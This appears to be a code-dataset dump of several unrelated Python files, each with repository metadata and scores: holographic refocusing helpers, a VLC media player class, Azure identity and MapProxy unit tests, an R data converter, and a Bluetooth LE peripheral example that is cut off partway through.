<filename>Digital Holographic Refocusing/myfunctions.py # Functions def rgb2gray(rgb): import numpy as np return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) def contrast(g_in): import numpy as np I_max = np.max(np.abs(g_in)**2) I_min = np.min(np.abs(g_in)**2) C = (I_max - I_min)/(I_max+I_min) return(C) def propagate(ein, lmda, z, ps): import numpy as np # Digitally refocuses a complex field a given distance, z. # (ref pg 67,<NAME>, Introduction to Fourier Optics) #inputs: # ein - complex field at input plane # lmda - wavelength of light [um] # z - vector of propagation distances [um] # ps - pixel size [um] [m,n]=ein.shape; M = m; N= n; eout = np.zeros([m,n,z.shape[0]])*1j; f_metric = np.zeros([z.shape[0]])*1j; Hout = np.zeros([m,n,z.shape[0]])*1j; # Spatial Sampling [x,y]=np.meshgrid(np.arange(-n/2, n/2), np.arange(-m/2, m/2)); fx=(x/(ps*M)); #frequency space width [1/m] fy=(y/(ps*N)); #frequency space height [1/m] fx2fy2 = fx**2 + fy**2; # Padding value ein_pad = ein; E0fft = np.fft.fftshift(np.fft.fft2(ein_pad)); mask = 1; for z_ind in range(0,z.shape[0]): H = np.exp(-1j*np.pi*lmda*z[z_ind]*fx2fy2); Eout_pad=np.fft.ifft2(np.fft.ifftshift(E0fft*H*mask)); f_metric[z_ind] = np.linalg.norm(np.real(H)*2*np.real(H)*E0fft,1) eout[:,:,z_ind]=Eout_pad Hout[:,:,z_ind]=H.copy() return(eout, Hout, f_metric) def interactive_slider(image, title): # Makes an interactive slider from ipywidgets import widgets import matplotlib.pyplot as plt # For making figures def slice_through_images(image): def slice_step(i_step): fig, axes = plt.subplots(figsize=(10, 5)) axes.imshow(image[:,:,i_step], cmap='gray') plt.title(title) plt.colorbar plt.show() return slice_step stepper = slice_through_images(image) widgets.interact(stepper, i_step=(0, image.shape[2]-1)) def imshowAnim(myimage, zs, niter, imsize): # Function to generate animated video import matplotlib.pyplot as plt # For making figures import numpy as np # Standard NumPy library from matplotlib import animation, rc # Used for inline 
animations from IPython.display import HTML # Used for inline animations fig = plt.figure(); fig=plt.figure(figsize=(imsize, imsize), dpi= 100, facecolor='w', edgecolor='k'); a = (myimage[:,:,0]); im=plt.imshow(np.abs(myimage[:,:,0]), extent=[0, 1, 0, 1], vmin=np.min(myimage[:,:,0]), vmax=np.max(myimage[:,:,0])); ttl = plt.title(('Image # %s'%(1))); plt.axis('off'); plt.close(); def init(): im.set_data(np.abs(myimage[:,:,0])); return [im] # animation function. This is called sequentially def animate(i): a = np.abs(myimage[:,:,i]); im.set_array(a); im.set_cmap('gray') ttl.set_text(('Defocus %s (um)'%(zs[i]))); # Change text return [im, ttl] # call the animator. blit=True means only re-draw the parts that have changed. anim = animation.FuncAnimation(fig, animate, init_func=init, frames=niter, interval=200); return(HTML(anim.to_html5_video()));
en
0.729042
# Functions # Digitally refocuses a complex field a given distance, z. # (ref pg 67,<NAME>, Introduction to Fourier Optics) #inputs: # ein - complex field at input plane # lmda - wavelength of light [um] # z - vector of propagation distances [um] # ps - pixel size [um] # Spatial Sampling #frequency space width [1/m] #frequency space height [1/m] # Padding value # Makes an interactive slider # For making figures # Function to generate animated video # For making figures # Standard NumPy library # Used for inline animations # Used for inline animations # %s'%(1))); # animation function. This is called sequentially # Change text # call the animator. blit=True means only re-draw the parts that have changed.
3.127892
3
Source/MediaPlayer.py
matias225/mp3TagEditor
0
6629011
import vlc from PyQt5 import QtWidgets import os class MediaPlayer(QtWidgets.QMainWindow): def __init__(self, *args, **kwargs): QtWidgets.QMainWindow.__init__(self, *args, **kwargs) self.instance = vlc.Instance() self.mediaplayer = self.instance.media_player_new() self.is_paused = False self.is_play = False self.media = None self.path = None def play_pause(self): if self.is_playing(): self.mediaplayer.pause() self.is_paused = True self.is_play = False else: if self.mediaplayer.play() == -1: self.media = self.instance.media_new(self.path) self.mediaplayer.set_media(self.media) self.mediaplayer.play() self.is_paused = False self.is_play = True def stop(self): self.mediaplayer.stop() def set_volume(self, volume): self.mediaplayer.audio_set_volume(volume) def set_path(self, path): self.path = path def get_path(self): return self.path def is_playing(self): return self.is_play def open_file(self, path): if not path: dialog_txt = "Elija el archivo a reproducir" path = QtWidgets.QFileDialog.getOpenFileName(self, dialog_txt, os.path.expanduser('~/mp3TagEditor'))[0] if not path: return self.media = self.instance.media_new(path) self.mediaplayer.set_media(self.media) self.media.parse() self.play_pause()
import vlc from PyQt5 import QtWidgets import os class MediaPlayer(QtWidgets.QMainWindow): def __init__(self, *args, **kwargs): QtWidgets.QMainWindow.__init__(self, *args, **kwargs) self.instance = vlc.Instance() self.mediaplayer = self.instance.media_player_new() self.is_paused = False self.is_play = False self.media = None self.path = None def play_pause(self): if self.is_playing(): self.mediaplayer.pause() self.is_paused = True self.is_play = False else: if self.mediaplayer.play() == -1: self.media = self.instance.media_new(self.path) self.mediaplayer.set_media(self.media) self.mediaplayer.play() self.is_paused = False self.is_play = True def stop(self): self.mediaplayer.stop() def set_volume(self, volume): self.mediaplayer.audio_set_volume(volume) def set_path(self, path): self.path = path def get_path(self): return self.path def is_playing(self): return self.is_play def open_file(self, path): if not path: dialog_txt = "Elija el archivo a reproducir" path = QtWidgets.QFileDialog.getOpenFileName(self, dialog_txt, os.path.expanduser('~/mp3TagEditor'))[0] if not path: return self.media = self.instance.media_new(path) self.mediaplayer.set_media(self.media) self.media.parse() self.play_pause()
none
1
2.848945
3
sdk/identity/azure-identity/tests/test_username_password_credential.py
szaher/azure-sdk-for-python
0
6629012
# ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ from azure.core.exceptions import ClientAuthenticationError from azure.core.pipeline.policies import ContentDecodePolicy, SansIOHTTPPolicy from azure.identity import UsernamePasswordCredential from azure.identity._internal.user_agent import USER_AGENT import pytest from helpers import build_aad_response, get_discovery_response, mock_response, Request, validating_transport try: from unittest.mock import Mock except ImportError: # python < 3.3 from mock import Mock # type: ignore def test_no_scopes(): """The credential should raise when get_token is called with no scopes""" credential = UsernamePasswordCredential("client-id", "username", "password") with pytest.raises(ClientAuthenticationError): credential.get_token() def test_policies_configurable(): policy = Mock(spec_set=SansIOHTTPPolicy, on_request=Mock()) transport = validating_transport( requests=[Request()] * 3, responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", policies=[policy], transport=transport) credential.get_token("scope") assert policy.on_request.called def test_user_agent(): transport = validating_transport( requests=[Request()] * 2 + [Request(required_headers={"User-Agent": USER_AGENT})], responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", transport=transport) credential.get_token("scope") def test_username_password_credential(): expected_token = "access-token" transport = validating_transport( requests=[Request()] * 3, # not validating requests because they're formed by MSAL responses=[ # tenant discovery mock_response(json_payload={"authorization_endpoint": "https://a/b", 
"token_endpoint": "https://a/b"}), # user realm discovery, interests MSAL only when the response body contains account_type == "Federated" mock_response(json_payload={}), # token request mock_response( json_payload={ "access_token": expected_token, "expires_in": 42, "token_type": "Bearer", "ext_expires_in": 42, } ), ], ) credential = UsernamePasswordCredential( client_id="some-guid", username="user@azure", password="<PASSWORD>", transport=transport, instance_discovery=False, # kwargs are passed to MSAL; this one prevents an AAD verification request ) token = credential.get_token("scope") assert token.token == expected_token
# ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ from azure.core.exceptions import ClientAuthenticationError from azure.core.pipeline.policies import ContentDecodePolicy, SansIOHTTPPolicy from azure.identity import UsernamePasswordCredential from azure.identity._internal.user_agent import USER_AGENT import pytest from helpers import build_aad_response, get_discovery_response, mock_response, Request, validating_transport try: from unittest.mock import Mock except ImportError: # python < 3.3 from mock import Mock # type: ignore def test_no_scopes(): """The credential should raise when get_token is called with no scopes""" credential = UsernamePasswordCredential("client-id", "username", "password") with pytest.raises(ClientAuthenticationError): credential.get_token() def test_policies_configurable(): policy = Mock(spec_set=SansIOHTTPPolicy, on_request=Mock()) transport = validating_transport( requests=[Request()] * 3, responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", policies=[policy], transport=transport) credential.get_token("scope") assert policy.on_request.called def test_user_agent(): transport = validating_transport( requests=[Request()] * 2 + [Request(required_headers={"User-Agent": USER_AGENT})], responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", transport=transport) credential.get_token("scope") def test_username_password_credential(): expected_token = "access-token" transport = validating_transport( requests=[Request()] * 3, # not validating requests because they're formed by MSAL responses=[ # tenant discovery mock_response(json_payload={"authorization_endpoint": "https://a/b", 
"token_endpoint": "https://a/b"}), # user realm discovery, interests MSAL only when the response body contains account_type == "Federated" mock_response(json_payload={}), # token request mock_response( json_payload={ "access_token": expected_token, "expires_in": 42, "token_type": "Bearer", "ext_expires_in": 42, } ), ], ) credential = UsernamePasswordCredential( client_id="some-guid", username="user@azure", password="<PASSWORD>", transport=transport, instance_discovery=False, # kwargs are passed to MSAL; this one prevents an AAD verification request ) token = credential.get_token("scope") assert token.token == expected_token
en
0.782511
# ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ # python < 3.3 # type: ignore The credential should raise when get_token is called with no scopes # not validating requests because they're formed by MSAL # tenant discovery # user realm discovery, interests MSAL only when the response body contains account_type == "Federated" # token request # kwargs are passed to MSAL; this one prevents an AAD verification request
2.106439
2
jind/df_to_rds.py
mohit1997/JIND
11
6629013
<reponame>mohit1997/JIND import pandas as pd import rpy2 from rpy2 import robjects from rpy2.robjects import pandas2ri import numpy as np import argparse import pickle parser = argparse.ArgumentParser() parser.add_argument('-d', action='store', default=None, dest='data', help='choose dataframe pickle file') parser.add_argument('-output', action='store', default=None, dest='output', help='name of the rds file') def convert_to_rds(df, filename): pandas2ri.activate() r_frame = robjects.conversion.py2rpy(df) robjects.r.assign("my_df", r_frame) robjects.r("saveRDS(my_df, file='{}')".format(filename)) if __name__ == "__main__": args = parser.parse_args() print(args) with open(args.data, 'rb') as f: data = pickle.load(f) convert_to_rds(data, args.output)
import pandas as pd import rpy2 from rpy2 import robjects from rpy2.robjects import pandas2ri import numpy as np import argparse import pickle parser = argparse.ArgumentParser() parser.add_argument('-d', action='store', default=None, dest='data', help='choose dataframe pickle file') parser.add_argument('-output', action='store', default=None, dest='output', help='name of the rds file') def convert_to_rds(df, filename): pandas2ri.activate() r_frame = robjects.conversion.py2rpy(df) robjects.r.assign("my_df", r_frame) robjects.r("saveRDS(my_df, file='{}')".format(filename)) if __name__ == "__main__": args = parser.parse_args() print(args) with open(args.data, 'rb') as f: data = pickle.load(f) convert_to_rds(data, args.output)
none
1
3.108344
3
mapproxy/test/system/test_cache_mbtiles.py
cunha17/mapproxy
347
6629014
# This file is part of the MapProxy project. # Copyright (C) 2011 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division import os import shutil from io import BytesIO from mapproxy.request.wms import WMS111MapRequest from mapproxy.test.http import MockServ from mapproxy.test.image import is_png, create_tmp_image from mapproxy.test.system import SysTest import pytest @pytest.fixture(scope="module") def config_file(): return "cache_mbtiles.yaml" @pytest.fixture(scope="class") def fixture_gpkg(base_dir): shutil.copy( os.path.join(os.path.dirname(__file__), "fixture", "cache.mbtiles"), base_dir.strpath, ) @pytest.mark.usefixtures("fixture_gpkg") class TestMBTilesCache(SysTest): def setup(self): self.common_map_req = WMS111MapRequest( url="/service?", param=dict( service="WMS", version="1.1.1", bbox="-180,-80,0,0", width="200", height="200", layers="mb", srs="EPSG:4326", format="image/png", styles="", request="GetMap", ), ) def test_get_map_cached(self, app): resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) def test_get_map_uncached(self, app): self.common_map_req.params.bbox = "-180,0,0,80" serv = MockServ(port=42423) serv.expects("/tiles/01/000/000/000/000/000/001.png") serv.returns(create_tmp_image((256, 256))) with serv: resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) # now cached 
resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data)
# This file is part of the MapProxy project. # Copyright (C) 2011 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division import os import shutil from io import BytesIO from mapproxy.request.wms import WMS111MapRequest from mapproxy.test.http import MockServ from mapproxy.test.image import is_png, create_tmp_image from mapproxy.test.system import SysTest import pytest @pytest.fixture(scope="module") def config_file(): return "cache_mbtiles.yaml" @pytest.fixture(scope="class") def fixture_gpkg(base_dir): shutil.copy( os.path.join(os.path.dirname(__file__), "fixture", "cache.mbtiles"), base_dir.strpath, ) @pytest.mark.usefixtures("fixture_gpkg") class TestMBTilesCache(SysTest): def setup(self): self.common_map_req = WMS111MapRequest( url="/service?", param=dict( service="WMS", version="1.1.1", bbox="-180,-80,0,0", width="200", height="200", layers="mb", srs="EPSG:4326", format="image/png", styles="", request="GetMap", ), ) def test_get_map_cached(self, app): resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) def test_get_map_uncached(self, app): self.common_map_req.params.bbox = "-180,0,0,80" serv = MockServ(port=42423) serv.expects("/tiles/01/000/000/000/000/000/001.png") serv.returns(create_tmp_image((256, 256))) with serv: resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) # now cached 
resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data)
en
0.835497
# This file is part of the MapProxy project. # Copyright (C) 2011 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # now cached
1.947264
2
blatann/examples/peripheral.py
dkkeller/blatann
0
6629015
<filename>blatann/examples/peripheral.py """ This example exhibits some of the functionality of a peripheral BLE device, such as reading, writing and notifying characteristics. This peripheral can be used with one of the central examples running on a separate nordic device, or can be run with the nRF Connect app to explore the contents of the service """ import atexit import binascii import struct import threading import time from blatann import BleDevice from blatann.uuid import Uuid16 from blatann.examples import example_utils, constants from blatann.gap import advertising, smp, IoCapabilities from blatann.waitables import GenericWaitable logger = example_utils.setup_logger(level="DEBUG") def on_connect(peer, event_args): """ Event callback for when a central device connects to us :param peer: The peer that connected to us :type peer: blatann.peer.Client :param event_args: None """ if peer: logger.info("Connected to peer") else: logger.warning("Connection timed out") def on_disconnect(peer, event_args): """ Event callback for when the client disconnects from us (or when we disconnect from the client) :param peer: The peer that disconnected :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.DisconnectionEventArgs """ logger.info("Disconnected from peer, reason: {}".format(event_args.reason)) def on_hex_conversion_characteristic_write(characteristic, event_args): """ Event callback for when the client writes to the hex conversion characteristic. This takes the data written, converts it to the hex representation, and updates the characteristic with this new value. If the client is subscribed to the characteristic, the client will be notified. 
:param characteristic: The hex conversion characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: the event arguments :type event_args: blatann.event_args.WriteEventArgs """ new_value = binascii.hexlify(event_args.value) logger.info("Got characteristic write - characteristic: {}, data: 0x{}".format(characteristic.uuid, new_value)) characteristic.set_value(new_value[:characteristic.max_length], notify_client=True) def on_gatts_subscription_state_changed(characteristic, event_args): """ Event callback for when a client subscribes or unsubscribes from a characteristic. This is the equivalent to when a client writes to a CCCD descriptor on a characteristic. :type characteristic: blatann.gatt.gatts.GattsCharacteristic :type event_args: blatann.event_args.SubscriptionStateChangeEventArgs """ logger.info("Subscription state changed - characteristic: {}, state: {}".format( characteristic.uuid, event_args.subscription_state)) def on_time_char_read(characteristic, event_args): """ Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic. This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic, it is only updated when read/observed by an outside actor. :param characteristic: the time characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: None """ t = time.time() ms = int((t * 1000) % 1000) msg = "Time: {}.{:03}".format(time.strftime("%H:%M:%S", time.localtime(t)), ms) characteristic.set_value(msg) def on_discovery_complete(peer, event_args): """ Callback for when the service discovery completes on the client. 
This will look for the client's Device name characteristic (part of the Generic Access Service) and read the value :param peer: The peer the discovery completed on :type peer: blatann.peer.Client :param event_args: The event arguments (unused) :type event_args: blatann.event_args.DatabaseDiscoveryCompleteEventArgs """ device_name_char = peer.database.find_characteristic(Uuid16(0x2A00)) if device_name_char: device_name_char.read().then(lambda c, e: logger.info("Client's device name: {}".format(e.value.decode("utf-8")))) else: logger.info("Peer does not have a device name characteristic") def on_security_level_changed(peer, event_args): """ Called when the security level changes, i.e. a bonded device connects and enables encryption or pairing has finished. If security has been enabled (i.e. bonded) and the peer's services have yet to be discovered, discover now. This code demonstrates that even in a peripheral connection role, the peripheral can still discover the database on the client, if the client has a database. 
:param peer: The peer that security was changed to :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.SecurityLevelChangedEventArgs """ if event_args.security_level in [smp.SecurityLevel.MITM, smp.SecurityLevel.LESC_MITM, smp.SecurityLevel.JUST_WORKS]: logger.info("Secure connections established, discovering database on the client") if not peer.database.services: peer.discover_services().then(on_discovery_complete) else: on_discovery_complete(peer, None) def on_client_pairing_complete(peer, event_args): """ Event callback for when the pairing process completes with the client :param peer: the peer that completed pairing :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.PairingCompleteEventArgs """ logger.info("Client Pairing complete, status: {}".format(event_args.status)) def on_passkey_display(peer, event_args): """ Event callback that is called when a passkey is required to be displayed to a user for the pairing process. :param peer: The peer the passkey is for :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.PasskeyDisplayEventArgs """ logger.info("Passkey display: {}, match: {}".format(event_args.passkey, event_args.match_request)) if event_args.match_request: response = input("Passkey: {}, do both devices show same passkey? [y/n]\n".format(event_args.passkey)) match = response.lower().startswith("y") event_args.match_confirm(match) def on_passkey_entry(peer, passkey_event_args): """ Callback for when the user is requested to enter a passkey to resume the pairing process. 
Requests the user to enter the passkey and resolves the event with the passkey entered :param peer: the peer the passkey is for :param passkey_event_args: :type passkey_event_args: blatann.event_args.PasskeyEntryEventArgs """ passkey = input("Enter passkey: ") passkey_event_args.resolve(passkey) class CountingCharacteristicThread(object): """ Thread which updates the counting characteristic and notifies the client each time its updated. This also demonstrates the notification queuing functionality--if a notification/indication is already in progress, future notifications will be queued and sent out when the previous ones complete. """ def __init__(self, characteristic): """ :param characteristic: the counting characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic """ self.current_value = 0 self._stop_event = threading.Event() self._stopped = threading.Event() self.characteristic = characteristic self.characteristic.on_notify_complete.register(self._on_notify_complete) self.thread = threading.Thread(target=self.run) atexit.register(self.join) self.thread.daemon = True self.thread.start() def join(self): """ Used to stop and join the thread """ self._stop_event.set() self._stopped.wait(3) def _on_notify_complete(self, characteristic, event_args): """ Event callback that is triggered when the notification finishes sending :param characteristic: The characteristic the notification was on :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: The event arguments :type event_args: blatann.event_args.NotificationCompleteEventArgs """ logger.info("Notification Complete, id: {}, reason: {}".format(event_args.id, event_args.reason)) def run(self): while not self._stop_event.is_set(): try: if not self.characteristic.client_subscribed: # Do nothing until a client is subscribed time.sleep(1) continue # Increment the value and pack it self.current_value += 1 value = struct.pack("<I", self.current_value) # Send out a notification of 
this new value waitable = self.characteristic.notify(value) # Send a burst of 16, then wait for them all to send before trying to send more if self.current_value % 16 == 0: waitable.wait() time.sleep(1) # Wait a second before sending out the next burst except Exception as e: logger.exception(e) self._stopped.set() def main(serial_port): # Create and open the device ble_device = BleDevice(serial_port) ble_device.configure() ble_device.open() # Set up desired security parameters ble_device.client.security.set_security_params(passcode_pairing=False, bond=False, lesc_pairing=False, io_capabilities=IoCapabilities.DISPLAY_ONLY, out_of_band=False) ble_device.client.security.on_pairing_complete.register(on_client_pairing_complete) ble_device.client.security.on_passkey_display_required.register(on_passkey_display) ble_device.client.security.on_passkey_required.register(on_passkey_entry) ble_device.client.security.on_security_level_changed.register(on_security_level_changed) # Create and add the math service service = ble_device.database.add_service(constants.MATH_SERVICE_UUID) # Create and add the hex conversion characteristic to the service hex_conv_char = service.add_characteristic(constants.HEX_CONVERT_CHAR_UUID, constants.HEX_CONVERT_CHAR_PROPERTIES, "Test Data") # Register the callback for when a write occurs and subscription state changes hex_conv_char.on_write.register(on_hex_conversion_characteristic_write) hex_conv_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create and add the counting characteristic, initializing the data to [0, 0, 0, 0] counting_char = service.add_characteristic(constants.COUNTING_CHAR_UUID, constants.COUNTING_CHAR_PROPERTIES, [0]*4) counting_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create the thread for the counting characteristic counting_char_thread = CountingCharacteristicThread(counting_char) # Create and add the time service time_service = 
ble_device.database.add_service(constants.TIME_SERVICE_UUID) # Add the time characteristic and register the callback for when its read time_char = time_service.add_characteristic(constants.TIME_CHAR_UUID, constants.TIME_CHAR_PROPERTIES, "Time") time_char.on_read.register(on_time_char_read) # Initialize the advertising and scan response data adv_data = advertising.AdvertisingData(local_name=constants.PERIPHERAL_NAME, flags=0x06) scan_data = advertising.AdvertisingData(service_uuid128s=constants.TIME_SERVICE_UUID, has_more_uuid128_services=True) ble_device.advertiser.set_advertise_data(adv_data, scan_data) # Start advertising logger.info("Advertising") ble_device.client.on_connect.register(on_connect) ble_device.client.on_disconnect.register(on_disconnect) ble_device.advertiser.start(timeout_sec=0, auto_restart=True) # Create a waitable that will never fire, and wait for some time w = GenericWaitable() w.wait(60*30, exception_on_timeout=False) # Keep device active for 30 mins # Cleanup counting_char_thread.join() logger.info("Done") ble_device.close() if __name__ == '__main__': main("COM13")
<filename>blatann/examples/peripheral.py """ This example exhibits some of the functionality of a peripheral BLE device, such as reading, writing and notifying characteristics. This peripheral can be used with one of the central examples running on a separate nordic device, or can be run with the nRF Connect app to explore the contents of the service """ import atexit import binascii import struct import threading import time from blatann import BleDevice from blatann.uuid import Uuid16 from blatann.examples import example_utils, constants from blatann.gap import advertising, smp, IoCapabilities from blatann.waitables import GenericWaitable logger = example_utils.setup_logger(level="DEBUG") def on_connect(peer, event_args): """ Event callback for when a central device connects to us :param peer: The peer that connected to us :type peer: blatann.peer.Client :param event_args: None """ if peer: logger.info("Connected to peer") else: logger.warning("Connection timed out") def on_disconnect(peer, event_args): """ Event callback for when the client disconnects from us (or when we disconnect from the client) :param peer: The peer that disconnected :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.DisconnectionEventArgs """ logger.info("Disconnected from peer, reason: {}".format(event_args.reason)) def on_hex_conversion_characteristic_write(characteristic, event_args): """ Event callback for when the client writes to the hex conversion characteristic. This takes the data written, converts it to the hex representation, and updates the characteristic with this new value. If the client is subscribed to the characteristic, the client will be notified. 
:param characteristic: The hex conversion characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: the event arguments :type event_args: blatann.event_args.WriteEventArgs """ new_value = binascii.hexlify(event_args.value) logger.info("Got characteristic write - characteristic: {}, data: 0x{}".format(characteristic.uuid, new_value)) characteristic.set_value(new_value[:characteristic.max_length], notify_client=True) def on_gatts_subscription_state_changed(characteristic, event_args): """ Event callback for when a client subscribes or unsubscribes from a characteristic. This is the equivalent to when a client writes to a CCCD descriptor on a characteristic. :type characteristic: blatann.gatt.gatts.GattsCharacteristic :type event_args: blatann.event_args.SubscriptionStateChangeEventArgs """ logger.info("Subscription state changed - characteristic: {}, state: {}".format( characteristic.uuid, event_args.subscription_state)) def on_time_char_read(characteristic, event_args): """ Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic. This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic, it is only updated when read/observed by an outside actor. :param characteristic: the time characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: None """ t = time.time() ms = int((t * 1000) % 1000) msg = "Time: {}.{:03}".format(time.strftime("%H:%M:%S", time.localtime(t)), ms) characteristic.set_value(msg) def on_discovery_complete(peer, event_args): """ Callback for when the service discovery completes on the client. 
This will look for the client's Device name characteristic (part of the Generic Access Service) and read the value :param peer: The peer the discovery completed on :type peer: blatann.peer.Client :param event_args: The event arguments (unused) :type event_args: blatann.event_args.DatabaseDiscoveryCompleteEventArgs """ device_name_char = peer.database.find_characteristic(Uuid16(0x2A00)) if device_name_char: device_name_char.read().then(lambda c, e: logger.info("Client's device name: {}".format(e.value.decode("utf-8")))) else: logger.info("Peer does not have a device name characteristic") def on_security_level_changed(peer, event_args): """ Called when the security level changes, i.e. a bonded device connects and enables encryption or pairing has finished. If security has been enabled (i.e. bonded) and the peer's services have yet to be discovered, discover now. This code demonstrates that even in a peripheral connection role, the peripheral can still discover the database on the client, if the client has a database. 
:param peer: The peer that security was changed to :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.SecurityLevelChangedEventArgs """ if event_args.security_level in [smp.SecurityLevel.MITM, smp.SecurityLevel.LESC_MITM, smp.SecurityLevel.JUST_WORKS]: logger.info("Secure connections established, discovering database on the client") if not peer.database.services: peer.discover_services().then(on_discovery_complete) else: on_discovery_complete(peer, None) def on_client_pairing_complete(peer, event_args): """ Event callback for when the pairing process completes with the client :param peer: the peer that completed pairing :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.PairingCompleteEventArgs """ logger.info("Client Pairing complete, status: {}".format(event_args.status)) def on_passkey_display(peer, event_args): """ Event callback that is called when a passkey is required to be displayed to a user for the pairing process. :param peer: The peer the passkey is for :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.PasskeyDisplayEventArgs """ logger.info("Passkey display: {}, match: {}".format(event_args.passkey, event_args.match_request)) if event_args.match_request: response = input("Passkey: {}, do both devices show same passkey? [y/n]\n".format(event_args.passkey)) match = response.lower().startswith("y") event_args.match_confirm(match) def on_passkey_entry(peer, passkey_event_args): """ Callback for when the user is requested to enter a passkey to resume the pairing process. 
Requests the user to enter the passkey and resolves the event with the passkey entered :param peer: the peer the passkey is for :param passkey_event_args: :type passkey_event_args: blatann.event_args.PasskeyEntryEventArgs """ passkey = input("Enter passkey: ") passkey_event_args.resolve(passkey) class CountingCharacteristicThread(object): """ Thread which updates the counting characteristic and notifies the client each time its updated. This also demonstrates the notification queuing functionality--if a notification/indication is already in progress, future notifications will be queued and sent out when the previous ones complete. """ def __init__(self, characteristic): """ :param characteristic: the counting characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic """ self.current_value = 0 self._stop_event = threading.Event() self._stopped = threading.Event() self.characteristic = characteristic self.characteristic.on_notify_complete.register(self._on_notify_complete) self.thread = threading.Thread(target=self.run) atexit.register(self.join) self.thread.daemon = True self.thread.start() def join(self): """ Used to stop and join the thread """ self._stop_event.set() self._stopped.wait(3) def _on_notify_complete(self, characteristic, event_args): """ Event callback that is triggered when the notification finishes sending :param characteristic: The characteristic the notification was on :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: The event arguments :type event_args: blatann.event_args.NotificationCompleteEventArgs """ logger.info("Notification Complete, id: {}, reason: {}".format(event_args.id, event_args.reason)) def run(self): while not self._stop_event.is_set(): try: if not self.characteristic.client_subscribed: # Do nothing until a client is subscribed time.sleep(1) continue # Increment the value and pack it self.current_value += 1 value = struct.pack("<I", self.current_value) # Send out a notification of 
this new value waitable = self.characteristic.notify(value) # Send a burst of 16, then wait for them all to send before trying to send more if self.current_value % 16 == 0: waitable.wait() time.sleep(1) # Wait a second before sending out the next burst except Exception as e: logger.exception(e) self._stopped.set() def main(serial_port): # Create and open the device ble_device = BleDevice(serial_port) ble_device.configure() ble_device.open() # Set up desired security parameters ble_device.client.security.set_security_params(passcode_pairing=False, bond=False, lesc_pairing=False, io_capabilities=IoCapabilities.DISPLAY_ONLY, out_of_band=False) ble_device.client.security.on_pairing_complete.register(on_client_pairing_complete) ble_device.client.security.on_passkey_display_required.register(on_passkey_display) ble_device.client.security.on_passkey_required.register(on_passkey_entry) ble_device.client.security.on_security_level_changed.register(on_security_level_changed) # Create and add the math service service = ble_device.database.add_service(constants.MATH_SERVICE_UUID) # Create and add the hex conversion characteristic to the service hex_conv_char = service.add_characteristic(constants.HEX_CONVERT_CHAR_UUID, constants.HEX_CONVERT_CHAR_PROPERTIES, "Test Data") # Register the callback for when a write occurs and subscription state changes hex_conv_char.on_write.register(on_hex_conversion_characteristic_write) hex_conv_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create and add the counting characteristic, initializing the data to [0, 0, 0, 0] counting_char 